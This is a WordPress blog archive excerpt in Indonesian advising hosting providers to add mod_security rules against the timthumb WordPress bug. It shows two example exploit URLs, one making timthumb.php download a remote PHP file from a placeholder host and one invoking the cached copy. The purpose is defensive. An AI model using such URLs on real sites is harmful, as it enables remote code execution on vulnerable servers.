Blog Archives

Setting mod security di Server Apache

Maraknya bug timthumb pada wordpress membuat kelabakan user yang menggunakan CMS WordPress, bila anda adalah seorang hoster (Provider Web Hosting ) dan memiliki server sendiri, lakukan upaya pencegahan exploitasi file timthumb wordpress dengan cara memasang rules mod security. http://example.com/wp-content/themes/themename/timthumb.php?src=http://example.org/file.php contoh tersebut membuat file timthumb mendownload file sang hacker sedangkan : http://example.com/wp-content/themes/themename/cache/1234567890abcdef.php Digunakan untuk menjalankan script […]

Post Tagged with
Read More

Swiftray Theme Powered by WordPress